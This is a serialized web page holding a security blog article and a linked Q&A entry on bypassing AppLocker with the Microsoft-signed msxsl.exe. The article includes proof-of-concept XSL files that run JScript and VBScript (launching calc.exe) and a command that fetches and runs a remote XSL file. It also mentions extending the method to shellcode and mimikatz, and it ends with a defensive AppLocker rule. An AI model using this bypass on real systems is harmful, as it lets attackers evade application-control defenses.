[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$faWaiS4lgjyB7l11fQno1CneW9PJcgcdypW9w1riW3Vg":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},547,"How can msxsl.exe be used to bypass AppLocker restrictions on script execution?","Msxsl.exe is a Microsoft-signed command-line tool that processes XSL transformations. By crafting an XML file that contains embedded JScript or VBScript code, an attacker can invoke `msxsl.exe` with that XML as input. Because the binary is trusted by AppLocker, the script runs without triggering script execution rules. This technique is detailed in the article [Use msxsl to bypass AppLocker](\u002Fnews\u002Fuse-msxsl-to-bypass-applocker).","\u003Cp>Msxsl.exe is a Microsoft-signed command-line tool that processes XSL transformations. By crafting an XML file that contains embedded JScript or VBScript code, an attacker can invoke `msxsl.exe` with that XML as input. Because the binary is trusted by AppLocker, the script runs without triggering script execution rules. This technique is detailed in the article [Use msxsl to bypass AppLocker](\u002Fnews\u002Fuse-msxsl-to-bypass-applocker).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fuse-msxsl-to-bypass-applocker\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-msxslexe-be-used-to-bypass-applocker-restrictions-on-script-execution-1777483151601","msxsl.exe, AppLocker bypass, JScript, VBScript, signed binary, XML script execution",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},135,"Use msxsl to bypass AppLocker","use-msxsl-to-bypass-applocker","Learn how to use Microsoft-signed msxsl.exe to bypass AppLocker and execute JScript\u002FVBScript code, including shellcode and exploits.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>A technique shared by Casey Smith@subTee on Twitter demonstrates that using Microsoft-signed msxsl.exe can execute JScript code, thereby bypassing AppLocker.\u003C\u002Fp>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017972658_0_6f676d4ab1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Twitter address is as follows:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftwitter.com\u002FsubTee\u002Fstatus\u002F877616321747271680\u003C\u002Fp>\u003Cp>\u003Cstrong>POC address is as follows:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgist.github.com\u002FsubTee\u002F47f16d60efc9f7cfefd62fb7a712ec8d\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will introduce this technique, analyze methods for further exploitation, and extend it by describing how to use msxsl.exe to execute VBScript code.\u003C\u002Fp>\u003Ch2>0x02 msxsl\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. msxsl.exe\u003C\u002Fh3>\u003Cul>\u003Cli>XSL (Extensible Stylesheet Language) Transformer\u003C\u002Fli>\u003Cli>Command-line tool\u003C\u002Fli>\u003Cli>Signed with Microsoft digital signature\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Download link:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fdownload\u002Fdetails.aspx?id=21714\u003C\u002Fp>\u003Cp>Execute as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017985191_1_72e903401f.jpeg\">\u003C\u002Fp>\u003Cp>Refer to Casey Smith's POC:\u003C\u002Fp>\u003Cp>customers.xml:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\"?-->\u003Cbr>\u003C!--?xml-stylesheet type=\"text\u002Fxsl\" href=\"script.xsl\" ?-->\u003Cbr>\u003Ccustomers>\u003Cbr>   \u003Ccustomer>\u003Cbr>      \u003Cname>John Smith\u003C\u002Fname>\u003Cbr>      \u003C\u002Fcustomer>\u003C\u002Fcustomers>\u003C\u002Fp>\u003Caddress>123 Elm St.\u003C\u002Faddress>\u003Cbr>      \u003Cphone>(123) 456-7890\u003C\u002Fphone>\u003Cbr>   \u003Cbr>   \u003Ccustomer>\u003Cbr>      \u003Cname>Mary Jones\u003C\u002Fname>\u003Cbr>      \u003Caddress>456 Oak Ave.\u003C\u002Faddress>\u003Cbr>      \u003Cphone>(156) 789-0123\u003C\u002Fphone>\u003Cbr>   \u003C\u002Fcustomer>\u003Cbr>\u003Cp>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>script.xml:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version='1.0'?-->\u003Cbr>\u003Cxsl:stylesheet version=\"1.0\" \u003Cbr=\"\">      xmlns:xsl=\"http:\u002F\u002Fwww.w3.org\u002F1999\u002FXSL\u002FTransform\"\u003Cbr>      xmlns:msxsl=\"urn:schemas-microsoft-com:xslt\"\u003Cbr>      xmlns:user=\"http:\u002F\u002Fmycompany.com\u002Fmynamespace\"&gt;\u003Cbr>\u003Cbr>\u003Cmsxsl:script language=\"JScript\" implements-prefix=\"user\">\u003Cbr>   function xml(nodelist) {\u003Cbr>\tvar r = new ActiveXObject(\"WScript.Shell\").Run(\"calc.exe\");\u003Cbr>      return nodelist.nextNode().xml;\u003Cbr>\t  \u003Cbr>   }\u003Cbr>\u003C\u002Fmsxsl:script>\u003Cbr>\u003Cxsl:template match=\"\u002F\">\u003Cbr>   \u003Cxsl:value-of select=\"user:xml(.)\">\u003Cbr>\u003C\u002Fxsl:value-of>\u003C\u002Fxsl:template>\u003Cbr>\u003C\u002Fxsl:stylesheet>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Successfully executed JScript code, calculator popped up, PoC execution as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017989608_2_cad42309e8.jpeg\">\u003C\u002Fp>\u003Cp>Enable AppLocker, add rules to block the execution of JS scripts, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017994250_3_1cd8798cc4.jpeg\">\u003C\u002Fp>\u003Cp>However, using msxsl can still execute JScript code\u003C\u002Fp>\u003Cp>In a previous article titled 'Loading .Net Programs Using JS', methods for loading .Net programs via JScript scripts were introduced. Combined with this article, the following inference can be drawn:\u003C\u002Fp>\u003Cp>\u003Cstrong>Using msxsl can also execute C# code\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Specifically, it can achieve the following functions:\u003C\u002Fp>\u003Cul>\u003Cli>Execute shellcode\u003C\u002Fli>\u003Cli>Execute mimikatz\u003C\u002Fli>\u003Cli>Execute PowerShell scripts\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>2. Execute shellcode\u003C\u002Fh3>\u003Cp>Refer to Cn33liz's StarFighters, address as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FCn33liz\u002FStarFighters\u002Fblob\u002Fmaster\u002FStarFighter.js\u003C\u002Fp>\u003Cp>Combined with Casey's POC, it is possible to execute shellcode using msxsl\u003C\u002Fp>\u003Cp>The complete code has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Testing as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017997383_4_c64276ab8a.jpeg\">\u003C\u002Fp>\u003Cp>For executing mimikatz and PowerShell scripts, the approach can refer to the previous article 'Loading .Net Programs Using JS'\u003C\u002Fp>\u003Ch2>0x03 Script Optimization\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Analyze the XML file format and appropriately optimize Casey's POC\u003C\u002Fp>\u003Ch3>1. Simplify customers.xml\u003C\u002Fh3>\u003Cp>XML element naming rules:\u003C\u002Fp>\u003Cul>\u003Cli>Names can contain letters, digits, and other characters\u003C\u002Fli>\u003Cli>Names cannot start with a digit or punctuation mark\u003C\u002Fli>\u003Cli>Names cannot start with the characters \"xml\" (or XML, Xml)\u003C\u002Fli>\u003Cli>Names cannot contain spaces\u003C\u002Fli>\u003Cli>Any name can be used; there are no reserved words\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The original POC content is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\"?-->\u003Cbr>\u003C!--?xml-stylesheet type=\"text\u002Fxsl\" href=\"script.xsl\" ?-->\u003Cbr>\u003Ccustomers>\u003Cbr>   \u003Ccustomer>\u003Cbr>      \u003Cname>John Smith\u003C\u002Fname>\u003Cbr>      \u003C\u002Fcustomer>\u003C\u002Fcustomers>\u003C\u002Fp>\u003Caddress>123 Elm St.\u003C\u002Faddress>\u003Cbr>      \u003Cphone>(123) 456-7890\u003C\u002Fphone>\u003Cbr>   \u003Cbr>   \u003Ccustomer>\u003Cbr>      \u003Cname>Mary Jones\u003C\u002Fname>\u003Cbr>      \u003Caddress>456 Oak Ave.\u003C\u002Faddress>\u003Cbr>      \u003Cphone>(156) 789-0123\u003C\u002Fphone>\u003Cbr>   \u003C\u002Fcustomer>\u003Cbr>\u003Cp>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Analysis shows that the XML file in parameter 1 is not important; elements can be arbitrarily specified.\u003C\u002Fp>\u003Cp>Remove irrelevant parameters, rename an XML element, and simplify the code as follows:\u003C\u002Fp>\u003Cp>\u003Ca>\u003C\u002Fa>\u003C\u002Fp>\u003Cp>Additionally, to reduce file creation, using script.xsl as the first XML file parameter is also acceptable.\u003C\u002Fp>\u003Cp>For example, the parameters are as follows:\u003C\u002Fp>\u003Cp>msxsl.exe script.xsl script.xsl\u003C\u002Fp>\u003Cp>Execution successful, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018000718_5_32aa6ad6c6.jpeg\">\u003C\u002Fp>\u003Ch3>2. Optimize script.xsl\u003C\u002Fh3>\u003Cp>Execute VBScript code:\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Testing shows that this XML script does not support CSharp, contradicting the documentation; this issue needs to be resolved\u003C\u002Fp>\u003Cp>Documentation address is as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002F533texsx(VS.71).aspx\u003C\u002Fp>\u003Cp>For VBScript language, return is not used to indicate function return values; instead, function name = value to return is used to represent the function's return value\u003C\u002Fp>\u003Cp>Complete content is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version='1.0'?-->\u003Cbr>\u003Cxsl:stylesheet version=\"1.0\" \u003Cbr=\"\">      xmlns:xsl=\"http:\u002F\u002Fwww.w3.org\u002F1999\u002FXSL\u002FTransform\"\u003Cbr>      xmlns:msxsl=\"urn:schemas-microsoft-com:xslt\"\u003Cbr>      xmlns:user=\"urn:my-scripts\"&gt;\u003Cbr>\u003Cbr>\u003Cmsxsl:script language=\"VBScript\" implements-prefix=\"user\">\u003Cbr>function myFunction()\u003Cbr>\tset shell=createobject(\"wscript.shell\")\u003Cbr>\tshell.run \"calc.exe\",0\u003Cbr>\tmyFunction = 0\u003Cbr>end function\u003Cbr>\u003Cbr>\u003C\u002Fmsxsl:script>\u003Cbr>\u003Cxsl:template match=\"\u002F\">\u003Cbr>\u003Cxsl:value-of select=\"user:myFunction()\">\u003Cbr>\u003C\u002Fxsl:value-of>\u003C\u002Fxsl:template>\u003Cbr>\u003C\u002Fxsl:stylesheet>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The above file content corresponds to the GitHub address: an open-source project\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The function name must correspond:\u003C\u002Fp>\u003Cp>\u003Cxsl:value-of select=\"user:myFunction()\">\u003C\u002Fxsl:value-of>\u003C\u002Fp>\u003Ch3>3. Remote Execution\u003C\u002Fh3>\u003Cp>msxsl.exe also supports remote execution with the following parameters:\u003C\u002Fp>\u003Cp>msxsl.exe https:\u002F\u002Fraw.githubusercontent.某开源项目.xml https:\u002F\u002Fraw.githubusercontent.某开源项目.xml\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018004851_6_4f3012f971.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This method was learned from Evi1cg, blog address: https:\u002F\u002Fevi1cg.me\u002Farchives\u002FAppLocker_Bypass_MSXSL.html\u003C\u002Fp>\u003Ch2>0x04 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Add executable rules for AppLocker, specifying msxsl.exe\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018009789_7_0225bac5bc.jpeg\">\u003C\u002Fp>\u003Cp>Even if the file path is changed, msxsl.exe still cannot be executed\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018011853_8_22eb9630cb.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the method of bypassing AppLocker using msxsl, but by customizing AppLocker rules, it is still possible to restrict the use of this method.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>A technique shared by Casey Smith@subTee on Twitter demonstrates that using Microsoft-signed msxsl.exe can execute JScript code, thereby bypassing AppLocker.\u003C\u002Fp>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017972658_0_6f676d4ab1-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Twitter address is as follows:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftwitter.com\u002FsubTee\u002Fstatus\u002F877616321747271680\u003C\u002Fp>\u003Cp>\u003Cstrong>POC address is as follows:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgist.github.com\u002FsubTee\u002F47f16d60efc9f7cfefd62fb7a712ec8d\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will introduce this technique, analyze methods for further exploitation, and extend it by describing how to use msxsl.exe to execute VBScript code.\u003C\u002Fp>\u003Ch2>0x02 msxsl\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. msxsl.exe\u003C\u002Fh3>\u003Cul>\u003Cli>XSL (Extensible Stylesheet Language) Transformer\u003C\u002Fli>\u003Cli>Command-line tool\u003C\u002Fli>\u003Cli>Signed with Microsoft digital signature\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Download link:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fdownload\u002Fdetails.aspx?id=21714\u003C\u002Fp>\u003Cp>Execute as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017985191_1_72e903401f-1.jpeg\">\u003C\u002Fp>\u003Cp>Refer to Casey Smith's POC:\u003C\u002Fp>\u003Cp>customers.xml:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\"?-->\u003Cbr>\u003C!--?xml-stylesheet type=\"text\u002Fxsl\" href=\"script.xsl\" ?-->\u003Cbr>\u003Ccustomers>\u003Cbr>   \u003Ccustomer>\u003Cbr>      \u003Cname>John Smith\u003C\u002Fname>\u003Cbr>      \u003C\u002Fcustomer>\u003C\u002Fcustomers>\u003C\u002Fp>\u003Caddress>123 Elm St.\u003C\u002Faddress>\u003Cbr>      \u003Cphone>(123) 456-7890\u003C\u002Fphone>\u003Cbr>   \u003Cbr>   \u003Ccustomer>\u003Cbr>      \u003Cname>Mary Jones\u003C\u002Fname>\u003Cbr>      \u003Caddress>456 Oak Ave.\u003C\u002Faddress>\u003Cbr>      \u003Cphone>(156) 789-0123\u003C\u002Fphone>\u003Cbr>   \u003C\u002Fcustomer>\u003Cbr>\u003Cp>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>script.xml:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version='1.0'?-->\u003Cbr>\u003Cxsl:stylesheet version=\"1.0\" \u003Cbr=\"\">      xmlns:xsl=\"http:\u002F\u002Fwww.w3.org\u002F1999\u002FXSL\u002FTransform\"\u003Cbr>      xmlns:msxsl=\"urn:schemas-microsoft-com:xslt\"\u003Cbr>      xmlns:user=\"http:\u002F\u002Fmycompany.com\u002Fmynamespace\"&gt;\u003Cbr>\u003Cbr>\u003Cmsxsl:script language=\"JScript\" implements-prefix=\"user\">\u003Cbr>   function xml(nodelist) {\u003Cbr>\tvar r = new ActiveXObject(\"WScript.Shell\").Run(\"calc.exe\");\u003Cbr>      return nodelist.nextNode().xml;\u003Cbr>\t  \u003Cbr>   }\u003Cbr>\u003C\u002Fmsxsl:script>\u003Cbr>\u003Cxsl:template match=\"\u002F\">\u003Cbr>   \u003Cxsl:value-of select=\"user:xml(.)\">\u003Cbr>\u003C\u002Fxsl:value-of>\u003C\u002Fxsl:template>\u003Cbr>\u003C\u002Fxsl:stylesheet>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Successfully executed JScript code, calculator popped up, PoC execution as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017989608_2_cad42309e8-1.jpeg\">\u003C\u002Fp>\u003Cp>Enable AppLocker, add rules to block the execution of JS scripts, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017994250_3_1cd8798cc4-1.jpeg\">\u003C\u002Fp>\u003Cp>However, using msxsl can still execute JScript code\u003C\u002Fp>\u003Cp>In a previous article titled 'Loading .Net Programs Using JS', methods for loading .Net programs via JScript scripts were introduced. Combined with this article, the following inference can be drawn:\u003C\u002Fp>\u003Cp>\u003Cstrong>Using msxsl can also execute C# code\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Specifically, it can achieve the following functions:\u003C\u002Fp>\u003Cul>\u003Cli>Execute shellcode\u003C\u002Fli>\u003Cli>Execute mimikatz\u003C\u002Fli>\u003Cli>Execute PowerShell scripts\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>2. Execute shellcode\u003C\u002Fh3>\u003Cp>Refer to Cn33liz's StarFighters, address as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FCn33liz\u002FStarFighters\u002Fblob\u002Fmaster\u002FStarFighter.js\u003C\u002Fp>\u003Cp>Combined with Casey's POC, it is possible to execute shellcode using msxsl\u003C\u002Fp>\u003Cp>The complete code has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Testing as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017997383_4_c64276ab8a-1.jpeg\">\u003C\u002Fp>\u003Cp>For executing mimikatz and PowerShell scripts, the approach can refer to the previous article 'Loading .Net Programs Using JS'\u003C\u002Fp>\u003Ch2>0x03 Script Optimization\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Analyze the XML file format and appropriately optimize Casey's POC\u003C\u002Fp>\u003Ch3>1. Simplify customers.xml\u003C\u002Fh3>\u003Cp>XML element naming rules:\u003C\u002Fp>\u003Cul>\u003Cli>Names can contain letters, digits, and other characters\u003C\u002Fli>\u003Cli>Names cannot start with a digit or punctuation mark\u003C\u002Fli>\u003Cli>Names cannot start with the characters \"xml\" (or XML, Xml)\u003C\u002Fli>\u003Cli>Names cannot contain spaces\u003C\u002Fli>\u003Cli>Any name can be used; there are no reserved words\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The original POC content is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\"?-->\u003Cbr>\u003C!--?xml-stylesheet type=\"text\u002Fxsl\" href=\"script.xsl\" ?-->\u003Cbr>\u003Ccustomers>\u003Cbr>   \u003Ccustomer>\u003Cbr>      \u003Cname>John Smith\u003C\u002Fname>\u003Cbr>      \u003C\u002Fcustomer>\u003C\u002Fcustomers>\u003C\u002Fp>\u003Caddress>123 Elm St.\u003C\u002Faddress>\u003Cbr>      \u003Cphone>(123) 456-7890\u003C\u002Fphone>\u003Cbr>   \u003Cbr>   \u003Ccustomer>\u003Cbr>      \u003Cname>Mary Jones\u003C\u002Fname>\u003Cbr>      \u003Caddress>456 Oak Ave.\u003C\u002Faddress>\u003Cbr>      \u003Cphone>(156) 789-0123\u003C\u002Fphone>\u003Cbr>   \u003C\u002Fcustomer>\u003Cbr>\u003Cp>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Analysis shows that the XML file in parameter 1 is not important; elements can be arbitrarily specified.\u003C\u002Fp>\u003Cp>Remove irrelevant parameters, rename an XML element, and simplify the code as follows:\u003C\u002Fp>\u003Cp>\u003Ca>\u003C\u002Fa>\u003C\u002Fp>\u003Cp>Additionally, to reduce file creation, using script.xsl as the first XML file parameter is also acceptable.\u003C\u002Fp>\u003Cp>For example, the parameters are as follows:\u003C\u002Fp>\u003Cp>msxsl.exe script.xsl script.xsl\u003C\u002Fp>\u003Cp>Execution successful, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018000718_5_32aa6ad6c6-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Optimize script.xsl\u003C\u002Fh3>\u003Cp>Execute VBScript code:\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Testing shows that this XML script does not support CSharp, contradicting the documentation; this issue needs to be resolved\u003C\u002Fp>\u003Cp>Documentation address is as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002F533texsx(VS.71).aspx\u003C\u002Fp>\u003Cp>For VBScript language, return is not used to indicate function return values; instead, function name = value to return is used to represent the function's return value\u003C\u002Fp>\u003Cp>Complete content is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version='1.0'?-->\u003Cbr>\u003Cxsl:stylesheet version=\"1.0\" \u003Cbr=\"\">      xmlns:xsl=\"http:\u002F\u002Fwww.w3.org\u002F1999\u002FXSL\u002FTransform\"\u003Cbr>      xmlns:msxsl=\"urn:schemas-microsoft-com:xslt\"\u003Cbr>      xmlns:user=\"urn:my-scripts\"&gt;\u003Cbr>\u003Cbr>\u003Cmsxsl:script language=\"VBScript\" implements-prefix=\"user\">\u003Cbr>function myFunction()\u003Cbr>\tset shell=createobject(\"wscript.shell\")\u003Cbr>\tshell.run \"calc.exe\",0\u003Cbr>\tmyFunction = 0\u003Cbr>end function\u003Cbr>\u003Cbr>\u003C\u002Fmsxsl:script>\u003Cbr>\u003Cxsl:template match=\"\u002F\">\u003Cbr>\u003Cxsl:value-of select=\"user:myFunction()\">\u003Cbr>\u003C\u002Fxsl:value-of>\u003C\u002Fxsl:template>\u003Cbr>\u003C\u002Fxsl:stylesheet>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The above file content corresponds to the GitHub address: an open-source project\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The function name must correspond:\u003C\u002Fp>\u003Cp>\u003Cxsl:value-of select=\"user:myFunction()\">\u003C\u002Fxsl:value-of>\u003C\u002Fp>\u003Ch3>3. Remote Execution\u003C\u002Fh3>\u003Cp>msxsl.exe also supports remote execution with the following parameters:\u003C\u002Fp>\u003Cp>msxsl.exe https:\u002F\u002Fraw.githubusercontent.某开源项目.xml https:\u002F\u002Fraw.githubusercontent.某开源项目.xml\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018004851_6_4f3012f971-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This method was learned from Evi1cg, blog address: https:\u002F\u002Fevi1cg.me\u002Farchives\u002FAppLocker_Bypass_MSXSL.html\u003C\u002Fp>\u003Ch2>0x04 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Add executable rules for AppLocker, specifying msxsl.exe\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018009789_7_0225bac5bc-1.jpeg\">\u003C\u002Fp>\u003Cp>Even if the file path is changed, msxsl.exe still cannot be executed\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018011853_8_22eb9630cb-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the method of bypassing AppLocker using msxsl, but by customizing AppLocker rules, it is still possible to restrict the use of this method.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1027,"Onedaysec",3,"published","2026-02-02T07:51:00.062Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Bypass AppLocker with msxsl.exe to Execute JScript & VBScript","msxsl, AppLocker bypass, JScript execution, VBScript, Windows security, Casey Smith, XML transformation, shellcode, mimikatz, PowerShell",null,false,[],{"docs":43,"hasNextPage":40},[44,45,46,4],550,549,548,{"title":39,"description":39,"image":39},"2026-07-24T15:37:12.811Z","2026-07-23T16:01:44.039Z","draft","2026-07-23T16:13:13.340Z"]